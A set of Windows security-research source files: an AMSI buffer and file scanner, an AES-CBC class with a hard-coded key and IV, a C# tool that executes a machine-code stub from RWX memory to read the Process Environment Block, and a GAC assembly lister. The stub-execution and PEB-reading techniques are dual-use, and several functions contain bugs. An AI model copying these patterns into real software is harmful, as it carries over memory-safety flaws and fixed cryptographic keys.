121 |
122 | return TRUE;
123 | }
124 |
125 | BOOL ScanString(LPWSTR* pszString, AMSI_RESULT* pAmsiResult) {
126 | if (!*pszString) {
127 | wprintf(L"[-] Empty string provided.\n");
128 | return FALSE;
129 | }
130 |
131 | ULONG lStringSize = 0;
132 | if (!GetStringLenght(*pszString, &lStringSize) || lStringSize == 0) {
133 | wprintf(L"[-] Empty string provided.\n");
134 | return FALSE;
135 | }
136 |
137 | PVOID pBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lStringSize);
138 | RtlCopyMemory(pBuffer, *pszString, lStringSize);
139 |
140 | HRESULT hr = AmsiScanBuffer(g_hAmsiContext, pBuffer, lStringSize, L"scan-string", g_hAmsiSession, pAmsiResult);
141 | if (FAILED(hr)) {
142 | wprintf(L"[-] Error while invoking amsi!AmsiScanBuffer (0x%08x)\n", hr);
143 | Cleanup();
144 | return 0x01;
145 | }
146 |
147 | HeapFree(GetProcessHeap(), 0, pBuffer);
148 | return TRUE;
149 | }
150 |
151 | BOOL ScanFile(LPWSTR* pszFileName, AMSI_RESULT* pAmsiResult) {
152 | // Check if file name is not empty
153 | if (!*pszFileName) {
154 | wprintf(L"[-] Empty file name provided.\n");
155 | return FALSE;
156 | }
157 |
158 | // Check if file exist
159 | DWORD dwFileAttributes = GetFileAttributes(*pszFileName);
160 | if (dwFileAttributes == INVALID_FILE_ATTRIBUTES) {
161 | wprintf(L"[-] File doesn't exist.\n");
162 | return FALSE;
163 | }
164 |
165 | // Get an handle to the file object
166 | HANDLE hFile = CreateFile(*pszFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, dwFileAttributes, NULL);
167 | if (hFile == INVALID_HANDLE_VALUE) {
168 | wprintf(L"[-] Unable to open the file (%d)\n", GetLastError());
169 | return FALSE;
170 | }
171 |
172 | // Get size of the file
173 | DWORD dwFileSize = GetFileSize(hFile, NULL);
174 | if (dwFileSize == 0) {
175 | wprintf(L"[-] Unable to get size of the file (%d)\n", GetLastError());
176 | CloseHandle(hFile);
177 | return FALSE;
178 | }
179 |
180 | // Read content of the file
181 | DWORD dwBytesRead = 0;
182 | PVOID pAsciiBuffer = HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, dwFileSize);
183 | BOOL bSuccess = ReadFile(hFile, pAsciiBuffer, dwFileSize, &dwBytesRead, NULL);
184 | if (!bSuccess || dwBytesRead < dwFileSize) {
185 | wprintf(L"[-] Unable to get size of the file (%d)\n", GetLastError());
186 | CloseHandle(hFile);
187 | HeapFree(g_hProcessHeap, 0, pAsciiBuffer);
188 | return FALSE;
189 | }
190 |
191 | // Convert from ASCII to Unicode
192 | int UnicodeBufferSize = MultiByteToWideChar(CP_ACP, 0, pAsciiBuffer, -1, NULL, 0);
193 | PVOID pUnicodeBuffer = HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, UnicodeBufferSize * sizeof(WCHAR));
194 | MultiByteToWideChar(CP_ACP, 0, pAsciiBuffer, -1, pUnicodeBuffer, UnicodeBufferSize);
195 | HeapFree(g_hProcessHeap, 0, pAsciiBuffer);
196 |
197 | // Scan file content
198 | ULONG lUnicodeBufferLength = 0;
199 | GetStringLenght(pUnicodeBuffer, &lUnicodeBufferLength);
200 |
201 | HRESULT hr = AmsiScanBuffer(g_hAmsiContext, pUnicodeBuffer, lUnicodeBufferLength, *pszFileName, g_hAmsiSession, pAmsiResult);
202 | if (FAILED(hr)) {
203 | wprintf(L"[-] Error while invoking amsi!AmsiScanBuffer (0x%08x)\n", hr);
204 | Cleanup();
205 | return FALSE;
206 | }
207 |
208 | HeapFree(g_hProcessHeap, 0, pUnicodeBuffer);
209 | CloseHandle(hFile);
210 | return TRUE;
211 | }
212 |
213 | VOID Cleanup() {
214 | if (!g_hAmsiContext && !g_hAmsiSession)
215 | AmsiCloseSession(g_hAmsiContext, g_hAmsiSession);
216 |
217 | if (!g_hAmsiSession)
218 | AmsiUninitialize(g_hAmsiSession);
219 | }
220 |
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/AES.cpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | #include "nthelpers.h"
8 | #include "AES.h"
9 | #include "Util.h"
10 | #include "Base64.h"
11 |
12 | #pragma comment(lib, "Bcrypt.lib")
13 |
14 | namespace CNG {
15 | AES::~AES() {
16 | if (this->hKeyHandle != NULL)
17 | ::BCryptDestroyKey(this->hKeyHandle);
18 |
19 | if (this->hBcryptAlgHandle != NULL)
20 | ::BCryptCloseAlgorithmProvider(this->hBcryptAlgHandle, 0);
21 |
22 | if (this->pbKeyObject != NULL)
23 | ::HeapFree(::GetProcessHeap(), 0, this->pbKeyObject);
24 |
25 | if (this->pbIV != NULL)
26 | ::HeapFree(::GetProcessHeap(), 0, this->pbIV);
27 |
28 | if (this->pbPlainText != NULL)
29 | ::HeapFree(::GetProcessHeap(), 0, this->pbPlainText);
30 |
31 | if (this->pbCipherText != NULL)
32 | ::HeapFree(::GetProcessHeap(), 0, this->pbCipherText);
33 | }
34 | AESEncrypt::~AESEncrypt() {}
35 | AESDecrypt::~AESDecrypt() {}
36 |
37 | BOOL WINAPI AES::Initialise() {
38 | if (this->bIsInitialised)
39 | return TRUE;
40 |
41 | NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
42 |
43 | CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptOpenAlgorithmProvider\n", 3);
44 | ntStatus = ::BCryptOpenAlgorithmProvider(&this->hBcryptAlgHandle, BCRYPT_AES_ALGORITHM, NULL, 0);
45 | if (!NT_SUCCESS(ntStatus)) {
46 | CNG::Util::WriteErrorMessage(L"First bcrypt!BCryptOpenAlgorithmProvider failed\n");
47 | return FALSE;
48 | }
49 |
50 | ntStatus = ::BCryptGetProperty(this->hBcryptAlgHandle, BCRYPT_OBJECT_LENGTH, (PBYTE)(&this->cbKeyObject), sizeof(DWORD), &this->cbData, 0);
51 | if (!NT_SUCCESS(ntStatus)) {
52 | CNG::Util::WriteErrorMessage(L"First bcrypt!BCryptGetProperty failed\n");
53 | return FALSE;
54 | }
55 |
56 | this->pbKeyObject = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbKeyObject);
57 | ntStatus = ::BCryptGetProperty(this->hBcryptAlgHandle, BCRYPT_BLOCK_LENGTH, (PBYTE)(&this->cbBlockLen), sizeof(DWORD), &this->cbData, 0);
58 | if (!NT_SUCCESS(ntStatus)) {
59 | CNG::Util::WriteErrorMessage(L"Second bcrypt!BCryptGetProperty failed\n");
60 | return FALSE;
61 | }
62 |
63 | if (this->cbBlockLen > sizeof(CNG::rgbIV))
64 | return FALSE;
65 |
66 | this->pbIV = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbBlockLen);
67 | ::RtlCopyMemory(this->pbIV, CNG::rgbIV, this->cbBlockLen);
68 | ntStatus = ::BCryptSetProperty(this->hBcryptAlgHandle, BCRYPT_CHAINING_MODE, (PBYTE)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
69 | if (!NT_SUCCESS(ntStatus)) {
70 | CNG::Util::WriteErrorMessage(L"bcrypt!BCryptSetProperty failed\n");
71 | return FALSE;
72 | }
73 |
74 | CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptGenerateSymmetricKey\n", 3);
75 | ntStatus = ::BCryptGenerateSymmetricKey(this->hBcryptAlgHandle, &this->hKeyHandle, this->pbKeyObject, this->cbKeyObject, (PBYTE)CNG::rgbAES128Key, sizeof(CNG::rgbAES128Key), 0);
76 | if (!NT_SUCCESS(ntStatus)) {
77 | CNG::Util::WriteErrorMessage(L"bcrypt!BCryptGenerateSymmetricKey failed\n");
78 | return FALSE;
79 | }
80 |
81 | this->bIsInitialised = TRUE;
82 | return this->bIsInitialised;
83 | }
84 |
85 | BOOL WINAPI AESEncrypt::SetBase64StringToEncrypt(std::string sPlaintext) {
86 | if (!sPlaintext.empty()) {
87 | std::vector vec = Base64::Base64Decode(sPlaintext);
88 | std::string tmp(vec.begin(), vec.end());
89 |
90 | return this->SetStringToEncrypt(tmp);
91 | }
92 |
93 | CNG::Util::WriteErrorMessage(L"Enpty string provided");
94 | return FALSE;
95 | }
96 |
97 | BOOL WINAPI AESEncrypt::SetStringToEncrypt(std::string sPlaintext) {
98 | if (!sPlaintext.empty()) {
99 | this->cbPlainText = (DWORD)sPlaintext.size();
100 | this->pbPlainText = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbPlainText);
101 | ::RtlCopyMemory(this->pbPlainText, sPlaintext.c_str(), sPlaintext.size());
102 |
103 | return TRUE;
104 | }
105 |
106 | CNG::Util::WriteErrorMessage(L"Enpty string provided");
107 | return FALSE;
108 | }
109 |
110 | BOOL WINAPI AESDecrypt::SetStringToDecrypt(std::string sCipherText) {
111 | if (!sCipherText.empty()) {
112 | this->cbCipherText = (DWORD)sCipherText.size();
113 | this->pbCipherText = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbPlainText);
114 | ::RtlCopyMemory(this->pbCipherText, sCipherText.c_str(), sCipherText.size());
115 |
116 | return TRUE;
117 | }
118 |
119 | CNG::Util::WriteErrorMessage(L"Enpty string provided");
120 | return FALSE;
121 | }
122 |
123 | BOOL WINAPI AESDecrypt::SetBase64StringToDecrypt(std::string sCipherText) {
124 | if (!sCipherText.empty()) {
125 | std::vector vec = Base64::Base64Decode(sCipherText);
126 | std::string tmp(vec.begin(), vec.end());
127 |
128 | return this->SetStringToDecrypt(tmp);
129 | }
130 |
131 | CNG::Util::WriteErrorMessage(L"Enpty string provided");
132 | return FALSE;
133 | }
134 |
135 | BOOL WINAPI AESEncrypt::Encrypt() {
136 | NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
137 |
138 | // Check that everything was set correctly
139 | if (this->bAlreadyUsed)
140 | return FALSE;
141 |
142 | // Get the output buffer size to encrypt
143 | CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptEncrypt\n", 3);
144 | ntStatus = ::BCryptEncrypt(this->hKeyHandle, this->pbPlainText, this->cbPlainText, NULL, this->pbIV, this->cbBlockLen, NULL, 0, &this->cbCipherText, BCRYPT_BLOCK_PADDING);
145 | if (!NT_SUCCESS(ntStatus)) {
146 | CNG::Util::WriteErrorMessage(L"First bcrypt!BCryptEncrypt failed\n");
147 | return FALSE;
148 | }
149 |
150 | CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptEncrypt\n", 3);
151 | this->pbCipherText = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbCipherText);
152 | ntStatus = ::BCryptEncrypt(this->hKeyHandle, this->pbPlainText, this->cbPlainText, NULL, this->pbIV, this->cbBlockLen, this->pbCipherText, this->cbCipherText, &this->cbData, BCRYPT_BLOCK_PADDING);
153 | if (!NT_SUCCESS(ntStatus)) {
154 | CNG::Util::WriteErrorMessage(L"Second bcrypt!BCryptEncrypt failed\n");
155 | return FALSE;
156 | }
157 |
158 | // Destroy the key
159 | CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptDestroyKey\n", 3);
160 | ntStatus = ::BCryptDestroyKey(this->hKeyHandle);
161 | if (!NT_SUCCESS(ntStatus)) {
162 | CNG::Util::WriteErrorMessage(L"bcrypt!BCryptDestroyKey failed\n");
163 | return FALSE;
164 | }
165 |
166 | this->bAlreadyUsed = TRUE;
167 | return this->bAlreadyUsed;
168 | }
169 |
170 | BOOL WINAPI AESDecrypt::Decrypt() {
171 | NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
172 |
173 | // Check that everything was set correctly
174 | if (this->bAlreadyUsed)
175 | return FALSE;
176 |
177 | CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptDecrypt\n", 3);
178 | ntStatus = ::BCryptDecrypt(this->hKeyHandle, this->pbCipherText, this->cbCipherText, NULL, this->pbIV, this->cbBlockLen, NULL, 0, &this->cbPlainText, BCRYPT_BLOCK_PADDING);
179 | if (!NT_SUCCESS(ntStatus)) {
180 | CNG::Util::WriteErrorMessage(L"First bcrypt!BCryptDecrypt failed\n");
181 | return FALSE;
182 | }
183 |
184 | CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptDecrypt\n", 3);
185 | this->pbPlainText = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbPlainText);
186 | ntStatus = ::BCryptDecrypt(this->hKeyHandle, this->pbCipherText, this->cbCipherText, NULL, this->pbIV, this->cbBlockLen, this->pbPlainText, this->cbPlainText , &this->cbData, BCRYPT_BLOCK_PADDING);
187 | if (!NT_SUCCESS(ntStatus)) {
188 | CNG::Util::WriteErrorMessage(L"Second bcrypt!BCryptDecrypt failed\n");
189 | return FALSE;
190 | }
191 |
192 | // Destroy the key
193 | CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptDestroyKey\n", 3);
194 | ntStatus = ::BCryptDestroyKey(this->hKeyHandle);
195 | if (!NT_SUCCESS(ntStatus)) {
196 | CNG::Util::WriteErrorMessage(L"bcrypt!BCryptDestroyKey failed\n");
197 | return FALSE;
198 | }
199 |
200 | this->bAlreadyUsed = TRUE;
201 | return this->bAlreadyUsed;
202 | }
203 |
204 | std::string WINAPI AESEncrypt::GetEncryptedString() {
205 | std::string tmp = (char*)this->pbCipherText;
206 | return tmp;
207 | }
208 |
209 | std::string WINAPI AESEncrypt::GetEncryptedBase64String() {
210 | std::string sCipherText;
211 | if (this->pbCipherText)
212 | sCipherText.append(Base64::Base64Encode(this->pbCipherText, this->cbCipherText));
213 |
214 | return sCipherText;
215 | }
216 |
217 | std::string WINAPI AESDecrypt::GetDecryptedString() {
218 | std::string tmp = (char*)this->pbPlainText;
219 | return tmp;
220 | }
221 |
222 | std::string WINAPI AESDecrypt::GetDecryptedBase64String() {
223 | std::string sPlaintext;
224 | if (this->pbCipherText)
225 | sPlaintext.append(Base64::Base64Encode(this->pbPlainText, this->cbPlainText));
226 |
227 | return sPlaintext;
228 | }
229 | }
--------------------------------------------------------------------------------
/Process/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace GetProcessEnvironmentBlock {
5 | public sealed class Program {
6 | static void Main(string[] args) {
7 | Console.WriteLine("[>] Copyright (C) 2020 Paul Laine (@am0nsec)");
8 | Console.WriteLine("[>] Get PEB w/ C#");
9 | Console.WriteLine(" ----------------------------------------\n");
10 |
11 | // ASM to get the PEB
12 | Span stub = stackalloc byte[10] {
13 | 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, // MOV RAX, GS:[0x60]
14 | 0xC3 // RET
15 | };
16 |
17 | // Execute the ASM and get the PEB address
18 | Console.WriteLine("[>] Get the address of the PEB:");
19 | IntPtr pPebAddress = IntPtr.Zero;
20 | unsafe {
21 | fixed (byte* ptr = &MemoryMarshal.GetReference(stub)) {
22 | GetPebDelegate func = Marshal.GetDelegateForFunctionPointer((IntPtr)ptr);
23 |
24 | if (!VirtualProtect((IntPtr)ptr, stub.Length, 0x40, out uint lpflOldProtect)) {
25 | Console.WriteLine("[-] Unable to find change memory page permission");
26 | return;
27 | }
28 |
29 | pPebAddress = func();
30 | if (pPebAddress == IntPtr.Zero) {
31 | Console.WriteLine("[-] Unable to find PEB address");
32 | return;
33 | }
34 | }
35 | }
36 | Console.WriteLine(" - 0x{0:x16}", pPebAddress.ToInt64());
37 |
38 | // Get the structure from memory
39 | PEB _PEB = new PEB();
40 | _PEB = Marshal.PtrToStructure(pPebAddress);
41 | if (_PEB.Equals(default(PEB))) {
42 | Console.WriteLine("[-] Invalid PEB structure returned");
43 | return;
44 | }
45 |
46 | // Get some info
47 | Console.WriteLine("\n[>] Extract few data:");
48 | Console.WriteLine($" - BeingDebugged: {_PEB.BeingDebugged.ToString()}");
49 | Console.WriteLine($" - Mutant: 0x{_PEB.Mutant.ToString("X16")}");
50 | Console.WriteLine($" - ImageBaseAddress: 0x{_PEB.ImageBaseAddress.ToString("X16")}");
51 | Console.WriteLine($" - Ldr: 0x{_PEB.Ldr.ToString("X16")}");
52 | Console.WriteLine($" - OSMajorVersion: {_PEB.OSMajorVersion}");
53 | Console.WriteLine($" - SessionId: {_PEB.SessionId}");
54 |
55 | #if DEBUG
56 | Console.ReadKey();
57 | #endif
58 | }
59 |
60 | [DllImport("kernel32.dll")]
61 | public static extern bool VirtualProtect(
62 | IntPtr lpAddress,
63 | int dwSize,
64 | uint flNewProtect,
65 | out uint lpflOldProtect
66 | );
67 | }
68 |
69 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
70 | public delegate IntPtr GetPebDelegate();
71 |
72 | [StructLayout(LayoutKind.Sequential, Pack = 0)]
73 | public struct UNICODE_STRING {
74 | public ushort Length;
75 | public ushort MaximumLength;
76 | private IntPtr Buffer;
77 | }
78 |
79 | [StructLayout(LayoutKind.Sequential, Pack = 0)]
80 | public struct LIST_ENTRY {
81 | public IntPtr Flink;
82 | public IntPtr Blink;
83 | }
84 |
85 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
86 | public struct PEB {
87 | public byte InheritedAddressSpace;
88 | public byte ReadImageFileExecOptions;
89 | public byte BeingDebugged;
90 | public byte BitField;
91 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
92 | public byte[] Padding0;
93 | public IntPtr Mutant;
94 | public IntPtr ImageBaseAddress;
95 | public IntPtr Ldr;
96 | public IntPtr ProcessParameters;
97 | public IntPtr SubSystemData;
98 | public IntPtr ProcessHeap;
99 | public IntPtr FastPebLock;
100 | public IntPtr AtlThunkSListPtr;
101 | public IntPtr IFEOKey;
102 | public uint CrossProcessFlags;
103 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
104 | public byte[] Padding1;
105 | public IntPtr KernelCallbackTable;
106 | public uint SystemReserved;
107 | public uint AtlThunkSListPtr32;
108 | public IntPtr ApiSetMap;
109 | public uint TlsExpansionCounter;
110 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
111 | public byte[] Padding2;
112 | public IntPtr TlsBitmap;
113 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
114 | public uint[] TlsBitmapBits;
115 | public IntPtr ReadOnlySharedMemoryBase;
116 | public IntPtr SharedData;
117 | public IntPtr ReadOnlyStaticServerData;
118 | public IntPtr AnsiCodePageData;
119 | public IntPtr OemCodePageData;
120 | public IntPtr UnicodeCaseTableData;
121 | public uint NumberOfProcessors;
122 | public uint NtGlobalFlag;
123 | public ulong CriticalSectionTimeout;
124 | public ulong HeapSegmentReserve;
125 | public ulong HeapSegmentCommit;
126 | public ulong HeapDeCommitTotalFreeThreshold;
127 | public ulong HeapDeCommitFreeBlockThreshold;
128 | public uint NumberOfHeaps;
129 | public uint MaximumNumberOfHeaps;
130 | public IntPtr ProcessHeaps;
131 | public IntPtr GdiSharedHandleTable;
132 | public IntPtr ProcessStarterHelper;
133 | public uint GdiDCAttributeList;
134 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
135 | public byte[] Padding3;
136 | public IntPtr LoaderLock;
137 | public uint OSMajorVersion;
138 | public uint OSMinorVersion;
139 | public ushort OSBuildNumber;
140 | public ushort OSCSDVersion;
141 | public uint OSPlatformId;
142 | public uint ImageSubsystem;
143 | public uint ImageSubsystemMajorVersion;
144 | public uint ImageSubsystemMinorVersion;
145 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
146 | public byte[] Padding4;
147 | public ulong ActiveProcessAffinityMask;
148 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 60)]
149 | public uint[] GdiHandleBuffer;
150 | public IntPtr PostProcessInitRoutine;
151 | public IntPtr TlsExpansionBitmap;
152 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 32)]
153 | public uint[] TlsExpansionBitmapBits;
154 | public uint SessionId;
155 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
156 | public byte[] Padding5;
157 | public ulong AppCompatFlags;
158 | public ulong AppCompatFlagsUser;
159 | public IntPtr pShimData;
160 | public IntPtr AppCompatInfo;
161 | public UNICODE_STRING CSDVersion;
162 | public IntPtr ActivationContextData;
163 | public IntPtr ProcessAssemblyStorageMap;
164 | public IntPtr SystemDefaultActivationContextData;
165 | public IntPtr SystemAssemblyStorageMap;
166 | public ulong MinimumStackCommit;
167 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
168 | public IntPtr[] SparePointers;
169 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 6)]
170 | public uint[] SpareUlongs;
171 | public IntPtr WerRegistrationData;
172 | public IntPtr WerShipAssertPtr;
173 | public IntPtr pUnused;
174 | public IntPtr pImageHeaderHash;
175 | public uint TracingFlags;
176 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
177 | public byte[] Padding6;
178 | public ulong CsrServerReadOnlySharedMemoryBase;
179 | public ulong TppWorkerpListLock;
180 | public LIST_ENTRY TppWorkerpList;
181 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 128)]
182 | public ulong[] WaitOnAddressHashTable;
183 | public IntPtr TelemetryCoverageHeader;
184 | public uint CloudFileFlags;
185 | public uint CloudFileDiagFlags;
186 | public byte PlaceholderCompatibilityMode;
187 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 7)]
188 | public byte[] PlaceholderCompatibilityModeReserved;
189 | public IntPtr LeapSecondData;
190 | public uint LeapSecondFlags;
191 | public uint NtGlobalFlag2;
192 | }
193 | }
194 |
--------------------------------------------------------------------------------
/Fusion/ListAssemblies/main.c:
--------------------------------------------------------------------------------
1 | /**
2 | * @file main.c
3 | * @data 06-09-2020
4 | * @author Paul Laîné (@am0nsec)
5 | * @version 1.0
6 | * @brief List Assemblies from the Global Assembly Cache (GAC).
7 | * @details
8 | * @link https://github.com/am0nsec/wspe
9 | * @copyright This project has been released under the GNU Public License v3 license.
10 | */
11 | #include
12 | #include
13 | #include
14 |
15 | #include "gacutil.h"
16 |
17 | /**
18 | * @brief Global HANDLE for Heap allocation/deallocation.
19 | */
20 | static HANDLE g_hProcessHeap = INVALID_HANDLE_VALUE;
21 |
22 | /**
23 | * @brief Entry point.
24 | * @param argc Number of arguments.
25 | * @param argv List of arguments.
26 | * @return Application exit code.
27 | */
28 | INT wmain(INT argc, PWCHAR* argv[]) {
29 | wprintf(L"\nList .NET Framework Assemblies from the Global Assembly Cache (GAC).\n");
30 | wprintf(L"Copyright (C) 2020 Paul Laine (@am0nsec)\n");
31 | wprintf(L"https://ntamonsec.blogpost.com\n\n");
32 |
33 | HMODULE hFusionModule = LoadLibraryW(FUSION_MODULE_PATH);
34 | if (hFusionModule == NULL) {
35 | wprintf(L"[-] Unable to load fusion.dll.\n\n");
36 | return 0x01;
37 | }
38 | wprintf(L"[+] Module loaded: fusion.dll.\n");
39 |
40 | // Get CreateAssemblyEnum function
41 | CreateAssemblyEnumFunc pCreateAssemblyEnumFunc = (CreateAssemblyEnumFunc)GetProcAddress(hFusionModule, "CreateAssemblyEnum");
42 | if (pCreateAssemblyEnumFunc == NULL) {
43 | wprintf(L"[-] Unable to find CreateAssemblyEnum function address.\n\n");
44 | return 0x01;
45 | }
46 | wprintf(L"[+] Function found: CreateAssemblyEnum.\n");
47 |
48 | // Get CreateAssemblyCache function
49 | CreateAssemblyCacheFunc pCreateAssemblyCacheFunc = (CreateAssemblyCacheFunc)GetProcAddress(hFusionModule, "CreateAssemblyCache");
50 | if (pCreateAssemblyEnumFunc == NULL) {
51 | wprintf(L"[-] Unable to find CreateAssemblyCache function address.\n\n");
52 | return 0x01;
53 | }
54 | wprintf(L"[+] Function found: CreateAssemblyCache.\n");
55 |
56 | // Get assembly enum interface
57 | IAssemblyEnum* pIAssemblyEnum = NULL;
58 | pCreateAssemblyEnumFunc(&pIAssemblyEnum, 0, NULL, ASM_CACHE_GAC, NULL);
59 | if (pIAssemblyEnum == NULL) {
60 | wprintf(L"[-] Unable to create fusion!IAssemblyEnum interface.\n\n");
61 | return 0x01;
62 | }
63 | wprintf(L"[+] Interface successfully created: fusion!IAssemblyEnum.\n");
64 |
65 | // Get assembly cache
66 | IAssemblyCache* pIAssemblyCache = NULL;
67 | pCreateAssemblyCacheFunc(&pIAssemblyCache, 0);
68 | if (pIAssemblyCache == NULL) {
69 | wprintf(L"[-] Unable to create fusion!IAssemblyCache interface.\n\n");
70 | return 0x01;
71 | }
72 | wprintf(L"[+] Interface successfully created: fusion!IAssemblyCache.\n\n");
73 |
74 | // Parse all Assemblies
75 | ParseAllAssemblies(&pIAssemblyEnum, &pIAssemblyCache);
76 | pIAssemblyCache->lpVtbl->Release(pIAssemblyCache);
77 | pIAssemblyEnum->lpVtbl->Release(pIAssemblyEnum);
78 | return 0x00;
79 | }
80 |
81 | /**
82 | * @brief Parse all Assemblies from the Global Assembly Cache (GAC)
83 | * @param ppIAssemblyEnum Pointer to an IAssemblyEnum interface.
84 | * @param ppIAssemblyCache Pointer to an IAssemblyCache interface.
85 | * @return Whether the function successfully executed.
86 | */
87 | HRESULT ParseAllAssemblies(PPIAssemblyEnum ppIAssemblyEnum, PPIAssemblyCache ppIAssemblyCache) {
88 | IAssemblyEnum* pEnum = *ppIAssemblyEnum;
89 | IAssemblyCache* pCache = *ppIAssemblyCache;
90 | if (pEnum == NULL || pCache == NULL)
91 | return E_FAIL;
92 |
93 | HRESULT hr = S_OK;
94 | g_hProcessHeap = GetProcessHeap();
95 |
96 | while (TRUE) {
97 | IAssemblyName* pIAssemblyName = NULL;
98 | hr = pEnum->lpVtbl->GetNextAssembly(pEnum, NULL, &pIAssemblyName, 0);
99 | if (!SUCCEEDED(hr) || pIAssemblyName == NULL)
100 | break;
101 |
102 | // Get name
103 | LPWSTR wszAssemblyName = NULL;
104 | hr = GetAssemblyName(&pIAssemblyName, &wszAssemblyName);
105 |
106 | // Get assembly path in GAC
107 | LPWSTR wszAssemblyGacPath = NULL;
108 | hr = GetAssemblyGACPath(&pCache, &wszAssemblyName, &wszAssemblyGacPath);
109 |
110 | // Get assembly version
111 | ASSEMBLY_VERSION AssemblyVersion = { 0 };
112 | hr = GetAssemblyVersion(&pIAssemblyName, &AssemblyVersion);
113 |
114 | // Display information
115 | wprintf(L"Name: %ws\n", wszAssemblyName);
116 | wprintf(L"Path: %ws\n", wszAssemblyGacPath);
117 | wprintf(L"Version: %d.%d.%d.%d\n\n", AssemblyVersion.dwMajor, AssemblyVersion.dwMinor, AssemblyVersion.dwBuild, AssemblyVersion.dwRevision);
118 |
119 | // Release memory
120 | if (wszAssemblyName != NULL)
121 | HeapFree(g_hProcessHeap, 0, wszAssemblyName);
122 | if (wszAssemblyGacPath != NULL)
123 | HeapFree(g_hProcessHeap, 0, wszAssemblyGacPath);
124 |
125 | // Release interface
126 | pIAssemblyName->lpVtbl->Finalize(pIAssemblyName);
127 | pIAssemblyName->lpVtbl->Release(pIAssemblyName);
128 | pIAssemblyName = NULL;
129 | }
130 |
131 | pEnum = NULL;
132 | pCache = NULL;
133 | return S_OK;
134 | }
135 |
136 | /**
137 | * @brief Get the name of an Assembly.
138 | * @param ppIAssemblyName Pointer to an IAssemblyName interface.
139 | * @param pwszAssemblyName Pointer to the name of the Assembly.
140 | * @return Whether the function successfully executed.
141 | */
142 | HRESULT GetAssemblyName(PPIAssemblyName ppIAssemblyName, LPWSTR* pwszAssemblyName) {
143 | PIAssemblyName pInterface = *ppIAssemblyName;
144 | if (pInterface == NULL || *pwszAssemblyName != NULL)
145 | return E_FAIL;
146 |
147 | // Get buffer size
148 | DWORD dwBufferSize = 0;
149 | HRESULT hr = pInterface->lpVtbl->GetName(pInterface, &dwBufferSize, 0);
150 | if (dwBufferSize == 0) {
151 | pInterface = NULL;
152 | return E_FAIL;
153 | }
154 |
155 | // Get name
156 | *pwszAssemblyName = (LPWSTR)HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, dwBufferSize * sizeof(WCHAR));
157 | hr = pInterface->lpVtbl->GetName(pInterface, &dwBufferSize, *pwszAssemblyName);
158 | if (!SUCCEEDED(hr) || *pwszAssemblyName == NULL) {
159 | HeapFree(g_hProcessHeap, 0, *pwszAssemblyName);
160 | pInterface = NULL;
161 | return E_FAIL;
162 | }
163 |
164 | pInterface = NULL;
165 | return S_OK;
166 | }
167 |
168 | /**
169 | * @brief Get the path of the Assembly in the Global Assembly Cache (GAC).
170 | * @param ppIAssemblyCache Pointer to an IAssemblyCache interface.
171 | * @param pwszAssemblyName Pointer to the name of the assembly to query information.
172 | * @param pwszAssemblyGacPath Pointer to the path of the assembly in the GAC.
173 | * @return Whether the function successfully executed.
174 | */
175 | HRESULT GetAssemblyGACPath(PPIAssemblyCache ppIAssemblyCache, LPWSTR* pwszAssemblyName, LPWSTR* pwszAssemblyGacPath) {
176 | PIAssemblyCache pInterface = *ppIAssemblyCache;
177 | if (pInterface == NULL || *pwszAssemblyName == NULL)
178 | return E_FAIL;
179 |
180 | // Get buffer size
181 | ASSEMBLY_INFO AssemblyInfo = { 0 };
182 | HRESULT hr = pInterface->lpVtbl->QueryAssemblyInfo(pInterface, QUERYASMINFO_FLAG_GETSIZE, *pwszAssemblyName, &AssemblyInfo);
183 | if (AssemblyInfo.cchBuf == 0) {
184 | pInterface = NULL;
185 | return E_FAIL;
186 | }
187 |
188 | // Get path
189 | AssemblyInfo.pszCurrentAssemblyPathBuf = (LPWSTR)HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, AssemblyInfo.cchBuf * sizeof(WCHAR));
